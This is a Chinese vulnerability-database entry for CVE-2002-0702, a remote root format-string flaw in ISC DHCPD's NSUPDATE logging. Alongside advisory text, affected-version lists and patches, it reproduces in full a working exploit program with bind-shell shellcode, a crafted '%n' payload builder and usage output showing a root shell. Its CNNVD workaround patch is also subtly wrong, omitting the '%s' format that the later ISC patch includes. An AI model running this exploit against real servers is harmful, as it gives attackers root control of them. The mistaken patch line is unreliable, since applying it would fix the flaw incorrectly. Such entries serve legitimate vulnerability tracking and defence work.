CVE-2002-0702
CVSS10.0
发布时间 :2002-07-26 00:00:00
修订时间 :2016-10-17 22:21:32
NMCOES    

[原文]Format string vulnerabilities in the logging routines for dynamic DNS code (print.c) of ISC DHCP daemon (DHCPD) 3 to 3.0.1rc8, with the NSUPDATE option enabled, allow remote malicious DNS servers to execute arbitrary code via format strings in a DNS server response.


[CNNVD]ISC DHCPD远程格式串溢出漏洞(CNNVD-200207-095)

        
        Internet Software Consortium (ISC)提供了一个动态主机配置服务器程序(DHCPD),此守护进程用于定位网络地址并发送配置参数给主机。
        ISC DHCPD存在一个格式串溢出漏洞,允许远程攻击者通过溢出攻击以DHCPD进程的权限(通常是root)在主机上执行任意指令,从而得到主机的控制权。
        版本3到版本3.0.1rc8 DHCPD有一个默认打开的NSUPDATE选项,此选项允许DHCP服务器在处理完DHCP请求后把主机相关的信息发送给DNS服务器。DNS服务器收到消息后会回复一个确认消息给DHCP服务器,消息中可能会包含有用户数据。DHCP服务器从DNS服务器收到确信消息后会通过syslog系统调用记录相关的信息。就在这个记录调用中存在格式串漏洞,远程攻击者可能通过格式串溢出攻击在主机上执行任意指令,得到主机的控制权。漏洞存在于common/print.c文件中,有问题的代码如下:
        if (errorp)
         log_error (obuf);
        else
         log_info (obuf); 、
        "obuf"可能包含用户指定的数据,攻击者可能在obuf中放到恶意的"%n"字串进行格式串溢出攻击。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:isc:dhcpd:3.0.1:rc3ISC DHCPD 3.0.1 rc3
cpe:/a:isc:dhcpd:3.0.1:rc4ISC DHCPD 3.0.1 rc4
cpe:/a:isc:dhcpd:3.0.1:rc1ISC DHCPD 3.0.1 rc1
cpe:/a:isc:dhcpd:3.0.1:rc2ISC DHCPD 3.0.1 rc2
cpe:/a:isc:dhcpd:3.0.1:rc7ISC DHCPD 3.0.1 rc7
cpe:/a:isc:dhcpd:3.0.1:rc8ISC DHCPD 3.0.1 rc8
cpe:/a:isc:dhcpd:3.0.1:rc5ISC DHCPD 3.0.1 rc5
cpe:/a:isc:dhcpd:3.0.1:rc6ISC DHCPD 3.0.1 rc6
cpe:/a:isc:dhcpd:3.0ISC DHCPD 3.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0702
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0702
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-095
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-028.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-028.0
http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0063.html
(UNKNOWN)  VULNWATCH  20020508 [VulnWatch] [NGSEC-2002-2] ISC DHCPDv3, remote root compromise
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000483
(UNKNOWN)  CONECTIVA  CLA-2002:483
http://marc.info/?l=bugtraq&m=102089498828206&w=2
(UNKNOWN)  BUGTRAQ  20020508 [NGSEC-2002-2] ISC DHCPDv3, remote root compromise
http://www.cert.org/advisories/CA-2002-12.html
(VENDOR_ADVISORY)  CERT  CA-2002-12
http://www.iss.net/security_center/static/9039.php
(VENDOR_ADVISORY)  XF  dhcpd-nsupdate-format-string(9039)
http://www.kb.cert.org/vuls/id/854315
(UNKNOWN)  CERT-VN  VU#854315
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-037.php
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2002:037
http://www.novell.com/linux/security/advisories/2002_19_dhcp.html
(UNKNOWN)  SUSE  SuSE-SA:2002:019
http://www.securityfocus.com/bid/4701
(VENDOR_ADVISORY)  BID  4701

- 漏洞信息

ISC DHCPD远程格式串溢出漏洞
危急 输入验证
2002-07-26 00:00:00 2005-10-20 00:00:00
远程  
        
        Internet Software Consortium (ISC)提供了一个动态主机配置服务器程序(DHCPD),此守护进程用于定位网络地址并发送配置参数给主机。
        ISC DHCPD存在一个格式串溢出漏洞,允许远程攻击者通过溢出攻击以DHCPD进程的权限(通常是root)在主机上执行任意指令,从而得到主机的控制权。
        版本3到版本3.0.1rc8 DHCPD有一个默认打开的NSUPDATE选项,此选项允许DHCP服务器在处理完DHCP请求后把主机相关的信息发送给DNS服务器。DNS服务器收到消息后会回复一个确认消息给DHCP服务器,消息中可能会包含有用户数据。DHCP服务器从DNS服务器收到确信消息后会通过syslog系统调用记录相关的信息。就在这个记录调用中存在格式串漏洞,远程攻击者可能通过格式串溢出攻击在主机上执行任意指令,得到主机的控制权。漏洞存在于common/print.c文件中,有问题的代码如下:
        if (errorp)
         log_error (obuf);
        else
         log_info (obuf); 、
        "obuf"可能包含用户指定的数据,攻击者可能在obuf中放到恶意的"%n"字串进行格式串溢出攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 给程序代码打上如下的补丁并重新编译运行:
         --- common/print.c Tue Apr 9 13:41:17 2002
         +++ common/print.c.patched Tue Apr 9 13:41:56 2002
         @@ -1366,8 +1366,8 @@
         *s++ = '.';
         *s++ = 0;
         if (errorp)
         - log_error (obuf);
         + log_error ("",obuf);
         else
         - log_info (obuf);
         + log_info ("",obuf);
         }
         #endif /* NSUPDATE */
        厂商补丁:
        ISC
        ---
        目前厂商已经发布了一个修补过后的版本3.0p1以修复这个安全问题并且在下一个3.0.1RC9的版本中包含这个漏洞的修复,请到厂商的主页下载:
        
        http://www.isc.org/products/DHCP/

- 漏洞信息 (21440)

ISC DHCPD 2.0/3.0.1 NSUPDATE Remote Format String Vulnerability (EDBID:21440)
bsd remote
2002-05-08 Verified
0 andi
N/A [点击下载]
source: http://www.securityfocus.com/bid/4701/info

The ISC DHCPD (Dynamic Host Configuration Protocol) is a collection of software implementing the DHCP protocol. It is available for a range of operating systems, including BSD and Solaris.

A remote format string vulnerability has been reported in multiple versions of the DHCPD server. User supplied data is logged in an unsafe fashion. Exploitation of this vulnerability may result in arbitrary code being executed by the DHCP server, which generally runs as the root user.

This vulnerability is dependant on the NSUPDATE configuration option being enabled. NSUPDATE is enabled by default in versions 3.0 and later of the DHCPD server.

/***********************************************************
 * hoagie_dhcpd.c
 *
 * local and remote exploit for isc dhcpd 3.0 (perhaps others)
 *
 * hi 19c3 guys ;)
 *
 * gcc hoagie_dhcpd.c -o hoagie_dhcpd
 *
 * Author: Andi <andi@void.at>
 *
 * Greetz to Greuff, philipp and the other hoagie-fellas :-)
 *
 * For this exploit we use the very very useful dhcp client
 * option: hex-coloumn list as fqdn. For this trick we change
 * in common/tables.c the parsing option to "X". 
 *
 * # ./hd 
 * hoagie_dhcpd.c - remote isc dhcpd 3.0 format string exploit
 * using return address location: 0xbfffdd4c
 * return address: 0xbfffde38
 * dummy vprintf address: 0xbfffdd70
 * now run: dhclient -d -cf dhcp.conf eth0
 * # ./dhclient -d -cf dhcp.conf eth0
 * Internet Software Consortium DHCP Client V3.0
 * Copyright 1995-2001 Internet Software Consortium.
 * All rights reserved.
 * For info, please visit http://www.isc.org/products/DHCP
 * 
 * Listening on LPF/eth0/00:02:3f:af:89:fb
 * Sending on   LPF/eth0/00:02:3f:af:89:fb
 * Sending on   Socket/fallback
 * DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 3
 * DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval ...
 * ^C
 * # telnet dhcpserverip 10000
 * id;
 * uid=0(root) gid=0(root) groups=0(root)
 *
 * after I've written the return address location and used the
 * last %n parameter, vfprintf still pops values from the stack
 * so what happened: the dhcp server tries to write the written
 * bytes to something like 0x2578.... which is part of the format
 * string. so you have to add another dummy address pair where
 * vfprintf can write dummy bytes.
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
 * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY 
 * DAMAGE DONE USING THIS PROGRAM.
 *
 ************************************************************/
#include <stdio.h>
#include <stdlib.h>

char shellcode[] = 
   "\x31\xdb"			// xor	ebx, ebx
   "\xf7\xe3"			// mul	ebx
   "\xb0\x66"			// mov     al, 102
   "\x53"			// push    ebx
   "\x43"			// inc     ebx
   "\x53"			// push    ebx
   "\x43"			// inc     ebx
   "\x53"			// push    ebx
   "\x89\xe1"			// mov     ecx, esp
   "\x4b"			// dec     ebx
   "\xcd\x80"			// int     80h
   "\x89\xc7"			// mov     edi, eax
   "\x52"			// push    edx
   "\x66\x68\x27\x10"		// push    word 4135
   "\x43"			// inc     ebx
   "\x66\x53"			// push    bx
   "\x89\xe1"			// mov     ecx, esp
   "\xb0\x10"			// mov	al, 16
   "\x50"			// push	eax
   "\x51"			// push    ecx
   "\x57"			// push    edi
   "\x89\xe1"			// mov     ecx, esp
   "\xb0\x66"			// mov     al, 102
   "\xcd\x80"			// int     80h
   "\xb0\x66"			// mov     al, 102
   "\xb3\x04"			// mov     bl, 4
   "\xcd\x80"			// int     80h
   "\x50"			// push	eax
   "\x50"			// push	eax
   "\x57"			// push	edi
   "\x89\xe1"			// mov	ecx, esp
   "\x43"			// inc	ebx
   "\xb0\x66"			// mov	al, 102
   "\xcd\x80"			// int	80h
   "\x89\xd9"			// mov	ecx, ebx
   "\x89\xc3"			// mov     ebx, eax
   "\xb0\x3f"			// mov     al, 63
   "\x49"			// dec     ecx
   "\xcd\x80"			// int     80h
   "\x41"			// inc     ecx
   "\xe2\xf8"			// loop    lp
   "\x51"			// push    ecx
   "\x68\x6e\x2f\x73\x68"	// push    dword 68732f6eh
   "\x68\x2f\x2f\x62\x69"	// push    dword 69622f2fh
   "\x89\xe3"			// mov     ebx, esp
   "\x51"			// push    ecx
   "\x53"			// push	ebx
   "\x89\xe1"			// mov	ecx, esp
   "\xb0\x0b"			// mov	al, 11
   "\xcd\x80";			// int     80h

char nop[] = "\x90\x90\x90\x90";

int retloc = 0xbfffdd4c;		/* use gdb to get it ;) */
int retaddr = 0xbfffde38;		/* hmm yes that sounds quite interesting */
int dummyaddr = 0xbfffdd70;		/* dummy stack pointer for vprintf */

void help() {
    printf("\t-l\t ... return address location\n");
    printf("\t-r\t ... return address\n");
    printf("\t-d\t ... dummy vfprintf address\n");
    exit(0);
} 

int main(int argc, char **argv) {
    char buffer[4096], output[4096], tmp[6], pad[4][20];
    FILE *fp;
    unsigned char rl[4], ra[4], da[4]; 
    int i, opt;
    unsigned int start, diff, ret;
    extern char *optarg;

    printf("hoagie_dhcpd.c - remote isc dhcpd 3.0 format string exploit\n");
    if (argc > 1) {
       while ( (opt = getopt(argc, argv, "hl:r:d:")) != EOF) {
          switch(opt) {
             case 'h': help(); break;
             case 'l': sscanf(optarg, "0x%x", &retloc); break;
             case 'r': sscanf(optarg, "0x%x", &retaddr); break;
             case 'd': sscanf(optarg, "0x%x", &dummyaddr); break;
          }
       }
    }
    printf("using return address location: 0x%x\n", retloc);
    printf("return address: 0x%x\n", retaddr); 
    printf("dummy vprintf address: 0x%x\n", dummyaddr);

    /* convert return address location */
    rl[0] = (char) (retloc >> 24);
    rl[1] = (char) (retloc >> 16);
    rl[2] = (char) (retloc >> 8);
    rl[3] = (char) retloc;

    /* convert dummy address */
    da[0] = (char) (dummyaddr >> 24);
    da[1] = (char) (dummyaddr >> 16);
    da[2] = (char) (dummyaddr >> 8);
    da[3] = (char) dummyaddr;

    /* calculate paddings */
    ra[3] = (char) (retaddr >> 24);
    ra[2] = (char) (retaddr >> 16);
    ra[1] = (char) (retaddr >> 8);
    ra[0] = (char) retaddr;

    start = 0xd4;
    for (i = 0; i < 4; i++) {
       if (start == ra[i]) {
          strcpy(pad[i], "");
       } else {
          if (start > ra[i]) {
             ret = ra[i];
             while (start > ret) ret += 0x100;
             diff = ret - start;
          } else {
	     diff = ra[i] - start;
          }
          sprintf(pad[i], "%%%du", diff); 
          start += diff;
       }
    }

    /* build the special format string */
    sprintf(buffer, 
            "%c%c%c%c\x70\xdd\xff\xbf%c%c%c%c\x70\xdd\xff\xbf"
            "%c%c%c%c\x70\xdd\xff\xbf%c%c%c%c"
            "%%08x%%08x%%08x%%08x%%08x%%08x%%08x%%08x%%08x%%08x"
            "%%08x%%08x%%08x%%08x%%08x%%08x%%08x%%08x" 
            "\x90\x90\x90\x90%c%c%c%c"
            "\x90\x90\x90\x90%c%c%c%c"
            "\x90\x90\x90\x90%c%c%c%c"
            "\x90\x90\x90\x90%c%c%c%c"
            "%s%%n" 
            "%s%%n"
            "%s%%n" 
            "%s%%n" 
	    "%s%s", 
            rl[3], rl[2], rl[1], rl[0], 
            rl[3] + 1, rl[2], rl[1], rl[0], 
            rl[3] + 2, rl[2], rl[1], rl[0],
            rl[3] + 3, rl[2], rl[1], rl[0], 
            da[3], da[2], da[1], da[0],
            da[3], da[2], da[1], da[0],
            da[3], da[2], da[1], da[0],
            da[3], da[2], da[1], da[0],
            pad[0], pad[1], pad[2], pad[3], nop, shellcode);

    /* convert to dhcp.conf syntax
     * hex style input format rules -> change your dhclient source -> tables.c and change fqdn to type X
     * to add binary values 
     */
    memset(output, 0, sizeof(output));
    for (i = 0; i < strlen(buffer) - 1; i++) {
        sprintf(tmp, "%02x:", (unsigned char)buffer[i]);
        strcat(output, tmp);
    }
    sprintf(tmp, "%02x", (unsigned char)buffer[i]);
    strcat(output, tmp);

    /* create dhcp.conf and write options */
    fp = fopen("dhcp.conf", "w");
    fprintf(fp, "send fqdn.server-update on;\n");
    fprintf(fp, "send fqdn.fqdn %s;", output);
    fclose(fp);

    /* have fun */
    printf("now run: dhclient -d -cf dhcp.conf eth0\n");
}
		

- 漏洞信息

14433
ISC DHCP Daemon NSUPDATE Logging Routine Format String Remote Code Execution
Local / Remote Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2002-05-08 Unknow
2002-05-08 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

ISC DHCPD NSUPDATE Remote Format String Vulnerability
Input Validation Error 4701
Yes No
2002-05-08 12:00:00 2009-07-11 12:46:00
Discovered by Fermín J. Serna <fjserna@ngsec.com>.

- 受影响的程序版本

ISC DHCPD 3.0.1 rc8
ISC DHCPD 3.0.1 rc7
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 4.1.1
ISC DHCPD 3.0.1 rc6
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
ISC DHCPD 3.0.1 rc5
ISC DHCPD 3.0.1 rc4
+ OpenPKG OpenPKG 1.0
ISC DHCPD 3.0.1 rc3
ISC DHCPD 3.0.1 rc2
ISC DHCPD 3.0.1 rc1
ISC DHCPD 3.0
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
- S.u.S.E. Linux 8.0
- S.u.S.E. Linux 7.3
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux Connectivity Server
- S.u.S.E. Linux Database Server 0
- S.u.S.E. Linux Enterprise Server for S/390
- S.u.S.E. SuSE eMail Server III
- SuSE SUSE Linux Enterprise Server 7
ISC DHCPD 2.0.pl5
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
ISC DHCPD 3.0.1 rc9
+ Conectiva Linux Enterprise Edition 1.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ OpenPKG OpenPKG 1.1
+ S.u.S.E. Linux 8.1
ISC DHCPD 3.0 pl1
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ Slackware Linux 8.1

- 不受影响的程序版本

ISC DHCPD 3.0.1 rc9
+ Conectiva Linux Enterprise Edition 1.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ OpenPKG OpenPKG 1.1
+ S.u.S.E. Linux 8.1
ISC DHCPD 3.0 pl1
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ Slackware Linux 8.1

- 漏洞讨论

The ISC DHCPD (Dynamic Host Configuration Protocol) is a collection of software implementing the DHCP protocol. It is available for a range of operating systems, including BSD and Solaris.

A remote format string vulnerability has been reported in multiple versions of the DHCPD server. User supplied data is logged in an unsafe fashion. Exploitation of this vulnerability may result in arbitrary code being executed by the DHCP server, which generally runs as the root user.

This vulnerability is dependant on the NSUPDATE configuration option being enabled. NSUPDATE is enabled by default in versions 3.0 and later of the DHCPD server.

- 漏洞利用

Exploits available:

- 解决方案

ISC has provided the following patch:

--- common/print.c Tue Apr 9 13:41:17 2002
+++ common/print.c.patched Tue Apr 9 13:41:56 2002
@@ -1366,8 +1366,8 @@
*s++ = '.';
*s++ = 0;
if (errorp)
- log_error (obuf);
+ log_error ("%s",obuf);
else
- log_info (obuf);
+ log_info ("%s",obuf);
}
#endif /* NSUPDATE */

Updated versions are available.


ISC DHCPD 3.0

ISC DHCPD 3.0.1 rc3

ISC DHCPD 3.0.1 rc4

ISC DHCPD 3.0.1 rc5

ISC DHCPD 3.0.1 rc7

ISC DHCPD 3.0.1 rc2

ISC DHCPD 3.0.1 rc1

ISC DHCPD 3.0.1 rc8

ISC DHCPD 3.0.1 rc6

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站